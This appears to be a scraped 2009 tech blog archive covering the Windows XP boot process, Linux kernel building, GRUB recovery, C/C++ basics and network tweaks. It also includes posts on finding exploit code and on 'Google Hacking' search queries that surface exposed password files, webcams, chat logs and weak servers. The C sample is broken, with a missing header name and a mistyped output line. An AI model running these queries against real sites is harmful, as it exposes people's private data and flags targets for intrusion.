NTLDR OS Selection BOOT.INI	If the file BOOT.INI is located in the root directory NTLDR will read it's contents into memory. If BOOT.INI contains entries for more than one operating system NTLDR will stop the boot sequence at this point, display a menu of choices, and wait for a specified period of time for the user to make a selection.	If the file BOOT.INI is not found in the root directory NTLDR will continue the boot sequence and attempt to load XP from the first partition of the first disk, typically C:\.

F8	Assuming that the operating system being loaded is Windows NT, 2000, or XP pressing F8 at this stage of the boot sequence to display various boot options including "Safe Mode" and "Last Known Good Configuration"	After each successful boot sequence XP makes a copy of the current combination of driver and system settings and stores it as the Last Known Good Configuration. This collection of settings can be used to boot the system subsequently if the installation of some new device has caused a boot failure.

NTLDR Hardware Detection	If the selected operating system is XP, NTLDR will continue the boot process by locating and loading the DOS based NTDETECT.COM program to perform hardware detection.	NTDETECT.COM collects a list of currently installed hardware components and returns this list for later inclusion in the registry under the HKEY_LOCAL_MACHINE\ HARDWARE key.

NTLDR Configuration Selection	If this computer has more than one defined Hardware Profile the NTLDR program will stop at this point and display the Hardware Profiles/Configuration Recovery menu.	Lacking more than one Hardware Profile NTLDR will skip this step and not display this menu.

Kernel Load	After selecting a hardware configuration (if necessary) NTLDR begins loading the XP kernel (NTOSKRNL.EXE).	During the loading of the kernel (but before it is initialized) NTLDR remains in control of the computer. The screen is cleared and a series of white rectangles progress across the bottom of the screen. NTLDR also loads the Hardware Abstraction Layer (HAL.DLL) at this time which will insulate the kernel from hardware. Both files are located in the \system32 directory.

NTLDR Boot Device Drivers	NTLDR now loads device drivers that are marked as boot devices. With the loading of these drivers NTLDR relinquishes control of the computer.	Every driver has a registry subkey entry under HKEY_LOCAL_MACHINE \SYSTEM\Services. Any driver that has a Start value of SERVICE_BOOT_START is considered a device to start at boot up. A period is printed to the screen for each loaded file (unless the /SOS switch is used in which case file names are printed.

Kernel Initialization	NTOSKRNL goes through two phases in its boot process - phase 0 and phase 1. Phase 0 initializes just enough of the microkernel and Executive subsystems so that basic services required for the completion of initialization become available.. At this point, the system display a graphical screen with a status bar indicating load status.	XP disables interrupts during phase 0 and enables them before phase 1. The HAL is called to prepare the interrupt controller; the Memory Manager, Object Manager, Security Reference Monitor, and Process Manager are initialized. Phase 1 begins when the HAL is called to prepare the system to accept interrupts from devices. If more than one processor is present the additional processors are initialized at this point. All Executive subsystems are reinitialized in the following order: 1) Object Manager 2) Executive 3) Microkernel 4) Security Reference Monitor 5) Memory Manager 6) Cache Manager 7) LPCS 8) I/O Manager 9) Process Manager

I/O Manager	The initialization of I/O Manager begins the process of loading all the systems driver files. Picking up where NTLDR left off, it first finishes the loading of boot devices. Next it assembles a prioritized list of drivers and attempts to load each in turn.	The failure of a driver to load may prompt NT to reboot and try to start the system using the values stored in the Last Known Good Configuration.

SMSS	The last task for phase 1 initialization of the kernel is to launch the Session Manager Subsystem (SMSS). SMSS is responsible for creating the user-mode environment that provides the visible interface to NT.	SMSS runs in user-mode but unlike other user-mode applications SMSS is considered a trusted part of the operating system and is also a native application (it uses only core Executive functions). These two features allow SMSS to start the graphics subsystem and login processes.

win32k.sys	SMSS loads the win32k.sys device driver which implements the Win32 graphics subsystem.	Shortly after win32k.sys starts it switches the screen into graphics mode. The Services Subsystem now starts all services mark as Auto Start. Once all devices and services are started the boot is deemed successful and this configuration is saved as the Last Known Good Configuration.

Logon	The XP boot process is not considered complete until a user has successfully logged onto the system. The process is begun by the WINLOGON.EXE file which is loaded as a service by the kernel and continued by the Local Security Authority (LSASS.EXE) which displays the logon dialog box.	This dialog box appears at approximately the time that the Services Subsystem starts the network service.

Source:

http://dotnetjunkies.com

http://www.geocities.com/asoke_dasgupta

How To Configure The Linux Kernel-I

2009-03-16T15:32:00.000-07:00

Warning

Downloading the kernel source code,uncompressing it, configuring the kernel, and building it—should be done as a normal user on the machine. Only the two or three commands it takes to install a new kernel should be done as the superuser (root)

Do not do any kernel development under the /usr/src/ directory tree at all, but only in a local user directory where nothing bad can happen to the system.

Tools to Build the Kernel

Compiler; Linker; make.

Tools to Use the Kernel

util-linux

module-init-tools

Filesystem-Specific Tools

JFS

ReiserFS

xfs

quotas

nfs

udev

proccess tools

pcmcia tools

Downloading the latest stable version of the Linux kernel 2.6.28.7

enter:

$ wget http://www.kernel.org/pub/linux/kernel/v2.6/linux-2.6.28.7.tar.gz

Creat a local directory in your home directory called linux to hold all of the different kernel source files:

$ mkdir ~/linux

Now move the source code into this directory:

$ mv ~/linux-2.6.28.7.tar.gz ~/linux/

And go into the linux directory:

$ cd ~/linux

$ ls

linux-2.6.28.7.tar.gz

Now that the source code is in the proper directory, uncompress the tree:

$ tar -xzvf linux-2.6.28.7.tar.gz

The screen will be filled with files that are uncompressed, and you will be left with the following in the linux directory:

$ ls

linux-2.6.28.7.tar.gz
linux-2.6.28.7

Configuring and Building

The most basic method of configuring a kernel is the make config method:

$ cd linux-2.6.28.7
$ make config

To create the default configuration, do the following:

$ make defconfig

Console Configuration Method

The menuconfig way of configuring a kernel is a console-based program that offers a way to move around the kernel configuration using the arrow keys on the keyboard.

To start up this configuration mode, enter:

$ make menuconfig

You will be shown a screen much like this

Graphical Configuration Methods

The gconfig and xconfig methods of configuring a kernel use a graphical program to allow you to modify the kernel configuration.

$ make gconfig

or

$ make xconfig

Use the mouse to navigate the submenus and select options

Next ...Modifying the configuration

How To Recover Ubuntu After Installing Windows

2009-03-15T08:36:00.000-07:00

If you re-install your XP, the Ubuntu Grub Loader in MBR will be overwrite.

You can’t go to Ubuntu anymore.

Boot the Desktop/Live CD. (Use Ubuntu 8.04 or later)

Open a terminal Application > Accessories > Terminal or type Alt-F2 and type

xterm

Start grub as root with the following command :

sudo grub

You will get a grub prompt (see below) which we will use to find the root partition and install grub to the MBR (hd0)
Type the following and press enter:

find /boot/grub/stage1

If you get "Error 15: File not found", try the following:

find /grub/stage1

Using this information, set the root device (fill in X,Y with whatever the find command returned):

(hdX,Y) Harddisk X, partition Y (you may have more than 1 HD)

grub> root (hdX,Y)

Install Grub:

grub> setup (hd0)

Exit Grub:

grub> quit

Reboot (to hard drive).

Grub should be installed and both Ubuntu and Windows should have been automatically detected.

Test Your First C & C++

2009-03-15T04:34:00.000-07:00

gcc is the GNU Compiler Collection supporting various programming languages.

g++ is the traditional nickname of GNU C++, a freely redistributable C++ compiler. It is part of gcc.

The Linux kernel is written in the C programming language, with a small amount of assembly language in some places.

C is the most powerful programming language in popular use.

To build the kernel, the gcc C compiler must be used.

If you wish to download the compiler and build it yourself, you can find it at

http://gcc.gnu.org.

C++ is mostly an extension of C.

C++ has the main advantage of being an Object Oriented language.

To use C and C++ you will need to do to install the build-essential package.

sudo apt-get install build-essential

This will install all the required packages for C and C++ compilers

Testing C and C++ Programs.

Compiling your first C program.

You need to open test.c file

sudo gedit test.c

add the following lines save and exit the file


#include 

int main()

{

printf("My First C\n");
return 0;

}

Compile the code using the following command


gcc -c test.c

That would produce an object file.

Then create an executable using the following command


gcc -o test test.c

Run this executable using the following command


./test

Output should show as follows

My Ferst C

Compiling your first C++ program.

If you want to run c++ program follow this procedure

g++ is the compiler that you must use.

you should use a .cpp file extension rather than a .c one

You need to create a file


sudo gedit first.cpp

add the following lines save and exit the file

Run your C++ Program


g++ first.cpp -o test

./test

Output should show as follows

Hello World!

Speed Up Your Network and Internet Access

2009-03-07T13:58:00.000-08:00

hacking the System Registry

Follow these steps:

Go to Start|Run type: regedit in the text box and click the OK button.
Then expand the
HKEY_LOCAL_MACHINE/Software/Microsoft/Windows/CurrentVersion/Explorer/RemoteComputer/NameSpace.

In the NameSpace folder you will find two entries.
One is "{2227A280-3AEA-1069-A2DE-08002B30309D}" which tells Explorer to show printers shared on the remote machine.
The other, "{D6277990-4C6A-11CF-8D87-00AA0060F5BF}," tells Explorer to show remote scheduled tasks.

This is the one that you should delete. This can be done by right-clicking the name of the key and selecting Delete.

If you have no use for viewing remote shared printers and are really only interested in shared files, consider deleting the printers key, "{2227A280-3AEA-1069-A2DE-08002B30309D}", as well. This will also boost your browsing speed.

Once you have deleted the key, you just need to restart and the changes will be in effect. Now your network computer browsing will be without needless delays.

Disabling unneeded protocols
Right-click the My Network Places icon on the desktop select Properties.
Or go to the Control Panel and click the Network Connections icon that is shown under the Classic view.

Next, right-click the network adapter with which you want to view the network protocols and select Properties.

This will bring up a list of the protocols installed as well as active on your adapter. Disabling a specific protocol Now that you have the list of installed and active protocols on your screen, you are ready to disable a protocol. To do so, just click the check box to remove the check. Then click the OK button and the protocol is no longer active on the network adapter.

Disable all protocols except for the TCP/IP protocol

Via: extremetech.com

Find your bandwidth in Vista really slow? Here is a simple hack for you.

2009-03-07T13:13:00.000-08:00

Dana has a nice post on how to use netsh to tune network connection settings on Windows Vista. He reports that their downloads “went from 700Kbit download speeds to 18Mbit”.

First, launch an elevated command prompt by clicking Start, typing cmd in the search box, then hold down ctrl+shift and press enter.

To view your initial settings, type:

netsh interface tcp show global

Next, from an elevated command prompt type:

netsh interface tcp set global autotuning=disabled
netsh interface tcp set global chimney=disabled
netsh interface tcp set global rss=disabled

If you ever want to re-enable the original settings, from an elevated command prompt type:

netsh interface tcp set global autotuning=normal
netsh interface tcp set global chimney=enabled
netsh interface tcp set global rss=enabled

Note that for some strange reason autotuning=normal, while the other two settings=enabled

Via : http://thebackroomtech.com/

Fix Slow USB 2.0 file transfer on Windows XP

2009-03-07T09:59:00.000-08:00

USB storage devices can be optimized for either quick removal or performance.

To optimize your USB drive for performance:

1. Right click on the USB drive and select properties
2. Select the Hardware tab
3. Under All Disk Drives, highlight your USB drive and select Properties
4. Select the Policies tab and select Optimize for performance.
5. Press OK twice, and your transfer speeds should increase dramatically

Note that when your drive is optimized for performance you’ll need to use the Safely Remove Hardware icon in the taskbar to eject the drive - otherwise you’ll risk corrupting your data by just removing the drive from the port.

Source: Julie

0day

2009-03-05T05:26:00.000-08:00

A zero-day (or zero-hour) attack or threat is a computer threat that tries to exploit unknown, undisclosed or patchfree computer application vulnerabilities. The term Zero Day is also used to describe unknown or Zero day viruses.

Zero-day exploits are released before the vendor patch is released to the public. Zero-day exploits generally circulate through the ranks of attackers until finally being released on public forums. The term derives from the age of the exploit. A zero-day exploit is usually unknown to the public and to the product vendor .

The term zero-day can also be used to describe warez-group releases of pirated software on or before the release of the software.

Exploit code, collectively called exploits, is a tool of the hacker trade. Designed to penetrate a target, most hackers have many different exploits at their disposal. Some exploits, termed zero day or 0day, remain underground for some period of time, eventually becoming public, posted to newsgroups or Web sites for the world to share.

Locating Exploit Code

Black hats generally provide exploits to aid fellow black hats in the hacking community.

White hats provide exploits as a way of eliminating false positives from automated tools during an assessment.

Simple searches such as remote exploit and vulnerable exploit locate exploit sites by focusing on common lingo used by the security community.
Other searches, such as inurl:0day, don’t work nearly as well as they used to, but old standbys like inurl:sploits still work fairly well.

Locating Public Exploit Sites

One way to locate exploit code is to focus on the file extension of the source
code and then search for specific content within that code. Since source code is
the text-based representation of the difficult-to-read machine code, Google is
well suited for this task. For example, a large number of exploits are written in C, which generally uses source code ending in a .c extension. Of course, a search for filetype:c c returns nearly 500,000 results, meaning that we need to narrow our search. A query for filetype:c exploit returns around 5,000 results, most of which are exactly the types of programs we’re looking for.

Source:

Wiki

I'm Johnny. I hack stuff.

Google Hacking

2009-03-05T02:21:00.000-08:00

Yes, I am a criminal. My crime is that of curiosity.
- Mentor, The Hacker Manifesto

There’s a sport called “Google Hacking” which is all about searching for seemingly private websites using Google. In fact, you can only find public websites using Google, because private (password-protected) pages can’t be found by Google – so it’s no real hacking (let alone “cracking,” which would consist of deleting, changing or abusing the found data).

But it’s fun nevertheless, and often enables people to discover pages someone was hoping for to stay private. This happens when the site is misconfigured, i.e. when the webmaster doesn’t know enough about how to set up a website.

Here are some of the most popular and powerful “Google hack” search queries.
Enter them at your own risk, and know that every once in a while you step onto a so-called honeypot (a fake website set up to lure hackers into it, with the goal of finding out more about them and their tactics).

Finding Error Messages

Search for: “A syntax error has occurred” filetype:ihtml

You’ll find: Pages which caused errors the last time Google checked them. This may hint at vulnerabilities or other unwanted side-effects.

How this works: The first phrase simply looks for an error the target server itself did once output. The “filetype” operator on the other hand restricts the result pages to only those which have the “ihtml” extension (which are sites using Informix).
A related search is “Warning: mysql_query()”.

Finding Seemingly Private Files

Search for: (password | passcode) (username | userid | user) filetype:csv

You’ll find: Files containing user names and similar.

How this works: The “filetype” operator makes sure only “Comma Separated Values” files will be returned. Those are not typical web pages, but data files. “(password | passcode)” tells Google the file must contain either the text “password” or “passcode,” or both (the “|” character means “or”). Also, result pages are restricted to those containing either of the words “username,” “userid” or “user.”

Finding File Listings

Search for: intitle:index-of last-modified private

You’ll find: Pages which list files found on the server.

How this works: The “intitle” operator used above will ensure that the target page contains the words “Index of” in the title. This is typical for those open directories which list files (they will have a title like “Index of /private/foo/bar”). “Last modified” on the other hand is a column header often used on those pages. And the word “private” makes sure we’ll find something of interest.
A related search query which finds FTP (File Transfer Protocol) information is intitle:index.of ws_ftp.ini

Finding Webcams

Search for: “powered by webcamXP” “Pro|Broadcast”

You’ll find: Public webcams set up by people to film a location, or themselves.

How this works: “Powered by WebcamXP” is a text found on specific kinds of webcam pages. A related search query to find cameras is inurl:“ViewerFrame?Mode=”.

Finding Weak Servers

Search for: intitle:“the page cannot be found” inetmgr

You’ll find: Potentially weak (IIS4) servers.

How this works: An old Microsoft Internet Information server may hint at security issues. This is one of many approaches that can be used to find such a weak server.

Finding Chat Logs

Search for: something “has quit” “has joined” filetype:txt

You’ll find: Chat log files showing what people talked about in a chat room.

How this works: Though the files found are all public, not everyone chatting on IRC (the Internet Relay Chat) is aware of potential logging mechanisms.
The “filetype” operator makes sure only text files are found, and “has quit”/ “has joined” are automated messages appearing in chat rooms. This search is your chance to tune into people’s chatter.Note you should replace “something” with the thing you are looking for.

Source:

55 Ways to Have Fun With Google

"This site may harm your computer" on every search result?!?!

2009-03-04T16:23:00.001-08:00

On 31st Jan 2008, any search result on google showed the message “This site may harm your computer” for all websites including Google.

What happened? Very simply, human error.

Unfortunately (and here's the human error), the URL of '/' was mistakenly checked in as a value to the file and '/' expands to all URLs.

Fortunately, our on-call site reliability team found the problem quickly and reverted the file.

(Marissa Mayer, VP, Search Products & User Experience )

Do You Think Is The Human Error Or h4x0r 3rr0r Or Other?

Do You Trust Microsoft?

2009-03-04T11:17:00.000-08:00

In return for some software of your choice:

Microsoft Windows Vista Ultimate (32-bit and 64-bit DVD)
Microsoft Office Ultimate 2007
Microsoft Money Plus Premium
Microsoft Student with Encarta Premium 2008
Microsoft Streets and Trips 2008

You allow Microsoft to watch your every move for 3 months.

Are you incredibly trusting of big corporations?

Vista vs Mac OS Ten

2009-03-03T12:54:00.000-08:00

Is Windows Vista Just an OS X Remake?

Many people have suggested that Microsoft simply appropriated ideas found in Mac OS X and Ubuntu for use in Windows Vista. After all, all three have desktop search capabilities, photo galleries as part of their file browsers, personal information managers that manage email, contacts, notes, and schedule. But David Pogue calls this "sour grapes" among Mac users (and presumably the same for Ubuntu users).

You decide. Is Vista just Ubuntu-OS X redivivus?

Via easy-ubuntu-linux.com

FiX PC Errors

PHPBB Vuln part-1

SQL Injection part - 1

Virus Hoax: Jdbgmgr.exe Is Not a Virus

Prevention

What is DSL?

Fix Some Missing Options In XP

How to find the IP address & address of the sender in email

Simple JavaScript Extract Login Form Password

Speed UP Gnome Menu

Reinstall Windows XP without re-activating

How To Determine If XP was Activated?

Find Your Windows XP Product Key On XP CD Or Your Disk

Speeding up disk access

The PC Boot Process - Windows XP

MBR

Partition Table

Boot Record

NTLDRInitial Phase

NTLDROS SelectionBOOT.INI

F8

NTLDRHardware Detection

NTLDRConfiguration Selection

Kernel Load

NTLDRBootDevice Drivers

Kernel Initialization

I/O Manager

SMSS

win32k.sys

Logon

How To Configure The Linux Kernel-I

How To Recover Ubuntu After Installing Windows

Test Your First C & C++

Speed Up Your Network and Internet Access

Find your bandwidth in Vista really slow? Here is a simple hack for you.

Fix Slow USB 2.0 file transfer on Windows XP

0day

Google Hacking

"This site may harm your computer" on every search result?!?!

Do You Trust Microsoft?

Vista vs Mac OS Ten

NTLDR
Initial Phase

NTLDR
OS Selection
BOOT.INI

NTLDR
Hardware Detection

NTLDR
Configuration Selection

NTLDR
Boot
Device Drivers